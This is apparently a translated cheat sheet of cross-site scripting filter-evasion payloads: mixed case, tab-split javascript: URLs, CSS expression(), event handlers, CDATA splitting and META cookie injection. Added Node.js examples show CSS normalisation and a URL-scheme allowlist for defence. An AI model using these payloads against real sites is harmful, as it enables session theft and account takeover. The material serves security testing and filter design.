1. Change the character case

<sCript>alert('d')</scRipT>
2. Add extra characters to get past regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another extension instead of .js

<script src="bad.jpg"></script>
4. Put JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab / -> newline: the spaces shown inside "javascript" above stand for a tab or a newline character in the payload.
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
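The backslash and comment tricks in section 7 work because a filter reads the raw text while the CSS tokenizer first drops comments and resolves escapes. The following Node.js code is an added example, not code from the original post: it normalises a user-supplied style value the same way before inspecting it. Function names, the pattern list and the sample values are this example's own assumptions.

```javascript
// Added example (not from the original post): normalise a style value the way a CSS
// tokenizer does (comments dropped, escapes resolved, strings kept intact), then inspect it.

// Remove /* ... */ comments outside quoted strings; an unterminated comment runs to the end.
function stripCssComments(css) {
  let out = '', i = 0, quote = null;
  while (i < css.length) {
    const c = css[i];
    if (quote) {                                   // inside a string: copy verbatim
      out += c;
      if (c === '\\' && i + 1 < css.length) out += css[++i];
      else if (c === quote) quote = null;
      i++;
    } else if (c === '"' || c === "'") { quote = c; out += c; i++; }
    else if (c === '/' && css[i + 1] === '*') {   // comment: skip to the closing */
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;
    } else { out += c; i++; }
  }
  return out;
}

// Resolve CSS escapes: "\" + 1-6 hex digits (+ one optional whitespace) is a code
// point, "\" + newline is a line continuation, "\" + any other char is that char.
function unescapeCss(css) {
  return css.replace(/\\(?:([0-9a-f]{1,6})\s?|(\r\n|[\n\r\f])|(.))/gi, (m, hex, nl, ch) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    return nl !== undefined ? '' : ch;
  });
}

function normalizeCssValue(css) {
  return unescapeCss(stripCssComments(css)).toLowerCase();
}

// Constructs that have no place in user-supplied inline styles: legacy IE expression(),
// script or data URLs inside url(), and @import of external stylesheets.
const DANGEROUS_CSS = [/expression\s*\(/, /url\s*\(\s*["']?\s*(?:javascript|vbscript|data)\s*:/, /@import/];

// True when the normalised value matches any of the patterns above.
function isDangerousCss(css) {
  const normalized = normalizeCssValue(css);
  return DANGEROUS_CSS.some(re => re.test(normalized));
}
```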
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag

<body onload="alert('onload')">

Event-handler attributes that can carry it:
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside a SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split up the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
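The case, tab/newline and hex-encoding tricks in sections 1, 6 and 8, and the javascript: URLs in section 14, all target the same weak spot: a filter that inspects the raw attribute text rather than the URL the browser will actually parse. The following Node.js code is an added example, not code from the original post: it shows a naive keyword blacklist being bypassed by constructed variants of those payloads, and a scheme allowlist that holds up. Function names, the allowed-scheme set and the sample inputs are this example's own assumptions.

```javascript
// Added example (not from the original post): keyword blacklist vs. scheme allowlist
// for URL-valued attributes (src, href, url()). Plain Node.js, no dependencies.

// Naive filter of the kind these payloads are written to get past.
function naiveBlacklist(url) {
  return !/javascript:/.test(url);
}

// Decode the HTML character references a browser resolves before the attribute
// value reaches the URL parser (decimal, hex and a handful of named ones).
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', Tab: '\t', NewLine: '\n' };
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (name !== undefined) return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
    const cp = parseInt(hex !== undefined ? hex : dec, hex !== undefined ? 16 : 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : '\uFFFD';
  });
}

// Normalise the way the WHATWG URL parser does: drop leading/trailing C0 controls and
// spaces, delete every ASCII tab and newline, then read the scheme case-insensitively.
function extractScheme(url) {
  const s = decodeHtmlEntities(url)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;   // null: relative URL, no scheme at all
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Allowlist check: accept only relative URLs and known-harmless schemes; everything
// else (javascript:, vbscript:, data:, ...) is rejected without having to be named.
function isSafeUrl(url) {
  const scheme = extractScheme(url);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed samples mirroring the evasions in this post.
const SAMPLES = [
  'JaVaScRiPt:alert(1)',          // section 1: mixed case
  'jav\tascr\nipt:alert(1)',      // section 6: tab and newline inside the scheme
  '&#106;avascript:alert(1)',     // section 8: decimal character reference for "j"
  '&#x6A;avascript:alert(1)',     // section 8: hex character reference for "j"
  'https://example.com/app.js',   // legitimate absolute URL
  '/images/logo.png',             // legitimate relative URL
];
// One row per sample so the two filters can be compared side by side.
function compareFilters() {
  return SAMPLES.map(u => ({ url: u, naive: naiveBlacklist(u), allowlist: isSafeUrl(u) }));
}
```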